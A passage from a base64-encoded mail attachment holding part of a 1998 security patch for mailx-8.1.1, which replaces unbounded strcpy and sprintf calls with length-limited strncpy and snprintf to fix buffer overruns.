X3N0YWNrW3JlZ3JldHBdKTsNCisJCXN0cm5jcHkobGV4c3RyaW5nLCBzdHJp
bmdfc3RhY2tbcmVncmV0cF0sIFNUUklOR0xFTik7DQorCQlsZXhzdHJpbmdb
U1RSSU5HTEVOLTFdPSdcMCc7DQogCQlsZXhudW1iZXIgPSBudW1iZXJzdGFj
a1tyZWdyZXRwXTsNCiAJCXJldHVybihyZWdyZXRzdGFja1tyZWdyZXRwLS1d
KTsNCiAJfQ0KQEAgLTY5NSwxMCArNjk2LDEyIEBADQogCXJlZ2lzdGVyIGNo
YXIgKmNwLCAqY3AyLCAqYmFja3VwOw0KIA0KIAlzdHIrKzsNCi0JaWYgKHN0
cmxlbihzdHIpID09IDApDQorCWlmIChzdHJsZW4oc3RyKSA9PSAwKSB7DQog
CQlzdHIgPSBsYXN0c2NhbjsNCi0JZWxzZQ0KLQkJc3RyY3B5KGxhc3RzY2Fu
LCBzdHIpOw0KKwl9IGVsc2Ugew0KKwkJc3RybmNweShsYXN0c2Nhbiwgc3Ry
LCAxMjgpOw0KKwkJbGFzdHNjYW5bMTI3XT0nXDAnOw0KKwl9DQogCW1wID0g
Jm1lc3NhZ2VbbWVzZy0xXTsNCiAJDQogCS8qDQpkaWZmIC1ydSBtYWlseC04
LjEuMS5vcmlnL21haW4uYyBtYWlseC04LjEuMS9tYWluLmMNCi0tLSBtYWls
eC04LjEuMS5vcmlnL21haW4uYwlGcmkgSnVuIDE0IDEwOjI3OjA1IDE5OTYN
CisrKyBtYWlseC04LjEuMS9tYWluLmMJU2F0IEp1biAyMCAwNDo1OToxOCAx
OTk4DQpAQCAtNDgsNiArNDgsMTIgQEANCiAjZW5kaWYNCiAjZW5kaWYgLyog
bm90IGxpbnQgKi8NCiANCisvKg0KKyAqIE1vc3Qgc3RyY3B5L3NwcmludGYg
ZnVuY3Rpb25zIGhhdmUgYmVlbiBjaGFuZ2VkIHRvIHN0cm5jcHkvc25wcmlu
dGYgdG8NCisgKiBjb3JyZWN0IHNldmVyYWwgYnVmZmVyIG92ZXJydW5zIChh
dCBsZWFzdCBvbmUgb3QgdGhlbSB3YXMgZXhwbG9pdGFibGUpLg0KKyAqIFNh
dCBKdW4gMjAgMDQ6NTg6MDkgQ0VTVCAxOTk4IEFsdmFybyBNYXJ0aW5leiBF
Y2hldmFycmlhIDxhbHZhcm9AbGFuZGVyLmVzPg0KKyAqLw0KKw0KICNpbmNs
dWRlICJyY3YuaCINCiAjaW5jbHVkZSA8ZmNudGwuaD4NCiAjaW5jbHVkZSA8
c3lzL2lvY3RsLmg+DQpkaWZmIC1ydSBtYWlseC04LjEuMS5vcmlnL3Y3Lmxv
Y2FsLmMgbWFpbHgtOC4xLjEvdjcubG9jYWwuYw0KLS0tIG1haWx4LTguMS4x
Lm9yaWcvdjcubG9jYWwuYwlGcmkgSnVuIDE0IDEwOjI3OjA5IDE5OTYNCisr
KyBtYWlseC04LjEuMS92Ny5sb2NhbC5jCVNhdCBKdW4gMjAgMDQ6MzQ6NTcg
MTk5OA0KQEAgLTYwLDE1ICs2MCwxOSBAQA0KICAqIG1haWwgaXMgcXVldWVk
KS4NCiAgKi8NCiB2b2lkDQotZmluZG1haWwodXNlciwgYnVmKQ0KK2ZpbmRt
YWlsKHVzZXIsIGJ1Ziwgc2l6ZSkNCiAJY2hhciAqdXNlciwgKmJ1ZjsNCisJ
aW50IHNpemU7DQogew0KIAljaGFyICptYm94Ow0KIA0KLQlpZiAoIShtYm94
ID0gZ2V0ZW52KCJNQUlMIikpKQ0KLQkJKHZvaWQpc3ByaW50ZihidWYsICIl
cy8lcyIsIF9QQVRIX01BSUxESVIsIHVzZXIpOw0KLQllbHNlDQotCQkodm9p
ZClzdHJjcHkoYnVmLCBtYm94KTsNCisJaWYgKCEobWJveCA9IGdldGVudigi
TUFJTCIpKSkgew0KKwkJKHZvaWQpc25wcmludGYoYnVmLCBzaXplLCAiJXMv
JXMiLCBfUEFUSF9NQUlMRElSLCB1c2VyKTsNCisJfSBlbHNlIHsNCisJCSh2
b2lkKXN0cm5jcHkoYnVmLCBtYm94LCBzaXplKTsNCisJCWJ1ZltzaXplLTFd
PSdcMCc7DQorCX0NCisNCiB9DQogDQogLyoNCg==
--1287857710-1215613336-898748369=:12634--